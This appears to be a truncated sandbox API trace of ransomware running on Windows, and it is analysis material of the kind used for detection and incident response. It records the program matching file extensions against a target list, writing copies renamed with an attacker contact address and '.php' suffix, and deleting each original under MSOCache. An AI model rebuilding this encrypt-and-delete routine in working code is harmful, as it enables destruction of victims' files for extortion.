lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString=".dbf") returned 4 [0035.216] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.216] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.217] lstrlenW (lpString=".1cd") returned 4 [0035.217] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.217] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.217] lstrlenW (lpString=".jpg") returned 4 [0035.217] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.217] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.217] lstrlenW (lpString="InfoPathMUI.xml") returned 15 [0035.217] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.218] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1231) returned 1 [0035.218] CloseHandle (hObject=0x1a0) returned 1 [0035.218] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0035.219] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.219] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.219] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.219] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.219] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.219] GetLastError () returned 0x0 [0035.219] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0035.220] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0035.221] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.221] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0035.222] SetEndOfFile (hFile=0x1a4) returned 1 [0035.222] CloseHandle (hObject=0x1a4) returned 1 [0035.222] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.222] SetEndOfFile (hFile=0x1a0) returned 1 [0035.223] CloseHandle (hObject=0x1a0) returned 1 [0035.223] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.223] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString=".doc") returned 4 [0035.224] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString=".docx") returned 5 [0035.224] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.224] lstrlenW (lpString=".pdf") returned 4 [0035.224] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString=".xls") returned 4 [0035.224] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString=".xlsx") returned 5 [0035.224] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.224] lstrlenW (lpString=".ppt") returned 4 [0035.224] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString=".zip") returned 4 [0035.224] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.224] lstrlenW (lpString=".rar") returned 4 [0035.224] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString=".bz2") returned 4 [0035.224] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString=".7z") returned 3 [0035.224] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString=".dbf") returned 4 [0035.224] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString=".1cd") returned 4 [0035.224] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.224] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.224] lstrlenW (lpString=".jpg") returned 4 [0035.224] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString=".doc") returned 4 [0035.225] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString=".docx") returned 5 [0035.225] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.225] lstrlenW (lpString=".pdf") returned 4 [0035.225] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString=".xls") returned 4 [0035.225] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString=".xlsx") returned 5 [0035.225] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.225] lstrlenW (lpString=".ppt") returned 4 [0035.225] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString=".zip") returned 4 [0035.225] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.225] lstrlenW (lpString=".rar") returned 4 [0035.225] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString=".bz2") returned 4 [0035.225] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString=".7z") returned 3 [0035.225] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString=".dbf") returned 4 [0035.225] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString=".1cd") returned 4 [0035.225] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.225] lstrlenW (lpString=".jpg") returned 4 [0035.225] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.226] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.226] lstrlenW (lpString="Setup.xml") returned 9 [0035.226] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.226] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1852) returned 1 [0035.226] CloseHandle (hObject=0x1a0) returned 1 [0035.226] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.226] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.226] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.444] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.444] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.444] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.444] GetLastError () returned 0x0 [0035.445] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x73c, lpOverlapped=0x0) returned 1 [0035.446] WriteFile (in: hFile=0x190, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x740, lpOverlapped=0x0) returned 1 [0035.447] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.447] WriteFile (in: hFile=0x190, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.447] SetEndOfFile (hFile=0x190) returned 1 [0035.447] CloseHandle (hObject=0x190) returned 1 [0035.448] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.448] SetEndOfFile (hFile=0x1a0) returned 1 [0035.448] CloseHandle (hObject=0x1a0) returned 1 [0035.448] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.449] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.449] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.449] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.449] lstrlenW (lpString=".doc") returned 4 [0035.449] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString=".docx") returned 5 [0035.449] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.449] lstrlenW (lpString=".pdf") returned 4 [0035.449] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString=".xls") returned 4 [0035.449] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString=".xlsx") returned 5 [0035.449] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.449] lstrlenW (lpString=".ppt") returned 4 [0035.449] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.449] lstrlenW (lpString=".zip") returned 4 [0035.449] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.449] lstrlenW (lpString=".rar") returned 4 [0035.449] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString=".bz2") returned 4 [0035.449] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.449] lstrlenW (lpString=".7z") returned 3 [0035.449] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.449] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.449] lstrlenW (lpString=".dbf") returned 4 [0035.450] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString=".1cd") returned 4 [0035.450] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString=".jpg") returned 4 [0035.450] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString=".doc") returned 4 [0035.450] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString=".docx") returned 5 [0035.450] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.450] lstrlenW (lpString=".pdf") returned 4 [0035.450] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString=".xls") returned 4 [0035.450] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString=".xlsx") returned 5 [0035.450] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.450] lstrlenW (lpString=".ppt") returned 4 [0035.450] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString=".zip") returned 4 [0035.450] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.450] lstrlenW (lpString=".rar") returned 4 [0035.450] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString=".bz2") returned 4 [0035.450] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.450] lstrlenW (lpString=".7z") returned 3 [0035.450] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.450] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.450] lstrlenW (lpString=".dbf") returned 4 [0035.450] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.451] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.451] lstrlenW (lpString=".1cd") returned 4 [0035.451] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.451] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.451] lstrlenW (lpString=".jpg") returned 4 [0035.451] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.451] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.451] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0035.451] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0036.476] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5557) returned 1 [0036.476] CloseHandle (hObject=0x1e8) returned 1 [0036.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0036.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0036.477] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.477] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.477] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0036.477] GetLastError () returned 0x0 [0036.477] ReadFile (in: hFile=0x1e8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0036.640] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0036.641] ReadFile (in: hFile=0x1e8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.641] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xee, lpOverlapped=0x0) returned 1 [0036.641] SetEndOfFile (hFile=0x1ec) returned 1 [0036.641] CloseHandle (hObject=0x1ec) returned 1 [0036.642] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.642] SetEndOfFile (hFile=0x1e8) returned 1 [0036.642] CloseHandle (hObject=0x1e8) returned 1 [0036.642] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.643] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0036.643] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.643] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.643] lstrlenW (lpString=".doc") returned 4 [0036.643] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString=".docx") returned 5 [0036.643] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.643] lstrlenW (lpString=".pdf") returned 4 [0036.643] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString=".xls") returned 4 [0036.643] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString=".xlsx") returned 5 [0036.643] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.643] lstrlenW (lpString=".ppt") returned 4 [0036.643] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.643] lstrlenW (lpString=".zip") returned 4 [0036.643] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.643] lstrlenW (lpString=".rar") returned 4 [0036.643] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString=".bz2") returned 4 [0036.643] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.643] lstrlenW (lpString=".7z") returned 3 [0036.644] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".dbf") returned 4 [0036.644] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".1cd") returned 4 [0036.644] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".jpg") returned 4 [0036.644] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".doc") returned 4 [0036.644] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString=".docx") returned 5 [0036.644] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.644] lstrlenW (lpString=".pdf") returned 4 [0036.644] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString=".xls") returned 4 [0036.644] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString=".xlsx") returned 5 [0036.644] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.644] lstrlenW (lpString=".ppt") returned 4 [0036.644] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".zip") returned 4 [0036.644] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.644] lstrlenW (lpString=".rar") returned 4 [0036.644] 